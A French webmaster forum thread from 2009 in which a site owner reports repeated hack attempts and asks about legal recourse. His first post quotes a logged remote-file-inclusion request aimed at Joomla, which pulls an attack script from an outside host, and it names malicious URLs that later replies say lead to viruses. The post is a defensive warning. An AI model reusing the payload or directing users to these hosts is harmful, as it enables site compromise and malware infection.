Tentative de Hack !

Discussion dans 'Droit du web (juridique, fiscalité...)' créé par bilos, 27 Juin 2009.

  1. bilos
    bilos WRInaute impliqué
    Inscrit:
    11 Octobre 2005
    Messages:
    629
    J'aime reçus:
    0
    Salut à tous :)

    Méfiez vous de l'adresse ip suivante : ip : [modéré OTP]

    C'est un pirate qui ne cesse pas de réaliser des tentatives de hack en XSS :(

    Voila le fichier qu'il teste avec -http://www.j-vision.co.kr/company/hotel/index.php/bo.do

    Pour ma part je l'ai eu :)

    J'ai sécurisé les paramètres qui peuvent passer des intrusions et j'ai placé un piège "alerte email ==> adresse ip , page en question et URL saisie pour pirater le code .

    Voilà ce que je viens de recevoir :

    Code:
    ip : [modéré OTP] sur la page /fr/.../index.php?option=com_noah&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/hotel/index.php/bo.do???
    C'est la réécriture des URLs qui m'a sauvé :) il croit que j'utilise joomla :mrgreen:

    P.S: Je le trouve encore dans une liste noire :) -http://www.maran.pamil-visions.com/maranxssfilter.php

    L'adresse ip est elle un moyen justificatif, si c'est le cas est ce que le log file d'un serveur est tenu en compte ?

    Merci pour votre attention
     
  2. biddybulle
    biddybulle WRInaute passionné
    Inscrit:
    30 Mai 2005
    Messages:
    1 428
    J'aime reçus:
    0
    Pour avoir été la cible d'un hack bien dissimulé. Je servais de relais également pour envoyer sans le savoir des attaques vers des passoires joomla.

    Quand c'est en france, tu es prévenu plus facilement par le Centre d'Expertise gouvernemental de Réponse et de Traitement des Attaques informatiques qui indiquent avec grande précision les pages incriminées et te demandes de les supprimer expréssément et de combler tes failles faute de quoi ...

    As tu envoyé un Abuse sur l'ip incriminé ?
     
  3. bilos
    bilos WRInaute impliqué
    Inscrit:
    11 Octobre 2005
    Messages:
    629
    J'aime reçus:
    0
    Je reçois la même requête sur une autre adresse [modéré OTP] :(

    C'est pas cool !

    Je sais bien que j'ai tout sécurisé alors même en cas de dégat mon hébergeur m'offre les backups.

    Bon Weekend :)
     
  4. benachem
    benachem WRInaute occasionnel
    Inscrit:
    2 Mai 2009
    Messages:
    276
    J'aime reçus:
    0
    tes liens envoient vers des virus, c'est normal ?
     
  5. Leonick
    Leonick WRInaute accro
    Inscrit:
    8 Août 2004
    Messages:
    19 274
    J'aime reçus:
    0
    c'est la nouvelle tendance des spams de referer : le webmaster curieux va cliquer pour savoir qui lui a fait un lien et là, sans antivirus à jour, son pc est vérolé :evil:
     
  6. j-mi
    j-mi WRInaute passionné
    Inscrit:
    17 Mai 2005
    Messages:
    1 753
    J'aime reçus:
    0
    mais c'est vraiement honteux de lire un truc comme ça
    c vicieux cette pratique
    mais pourquoi fourguer des saleté dans les pc des gens
     
  7. Leonick
    Leonick WRInaute accro
    Inscrit:
    8 Août 2004
    Messages:
    19 274
    J'aime reçus:
    0
    pour pouvoir prendre la main dessus
     
  8. mookster
    mookster WRInaute occasionnel
    Inscrit:
    5 Novembre 2007
    Messages:
    304
    J'aime reçus:
    0
    ou vendre des anti-virus ? :)
     
Chargement...
Similar Threads - Tentative Hack Forum Date
Tentative de hack ? un aide svp ! Administration d'un site Web 5 Juin 2012
Tentative de hack ? un aide svp ! Développement d'un site Web ou d'une appli mobile 5 Juin 2012
tentative de hacking ou pas ? Administration d'un site Web 10 Janvier 2011
Url ressemblant à une tentative de hack Développement d'un site Web ou d'une appli mobile 21 Septembre 2010
Tentative de hack sur mon forum? Développement d'un site Web ou d'une appli mobile 21 Mars 2009
tentative de hackage ? Administration d'un site Web 18 Avril 2008
Interdire les tentative de hack par brute force URL Rewriting et .htaccess 29 Février 2008
Tentative de hack ? Administration d'un site Web 22 Janvier 2008
tentative de hacking sur mon site? Demandes d'avis et de conseils sur vos sites 29 Janvier 2007
Tentative de Hack ? Administration d'un site Web 17 Octobre 2006
que faire pour se protéger après une tentative de hacking ? Administration d'un site Web 15 Octobre 2006
Tentative de Hacking ou Pas? Administration d'un site Web 12 Septembre 2006
Blocage IP selon tentatives d'URL URL Rewriting et .htaccess 21 Décembre 2016
Conseil pour seconde tentative de sortie de pénalité Référencement Google 19 Juillet 2016
Tentative d'intrusion sous wordpress Administration d'un site Web 27 Octobre 2015
Tentative de piratage ^^ Administration d'un site Web 12 Avril 2011
Echec navrant du référencement après plusieurs tentatives d'amélioration Débuter en référencement 19 Janvier 2011
Tentatives d'arnaques Droit du web (juridique, fiscalité...) 11 Octobre 2010
tentative de mise en place d'un systeme Demandes d'avis et de conseils sur vos sites 14 Septembre 2010
Attention tentative de pishing du site ovh Administration d'un site Web 15 Août 2010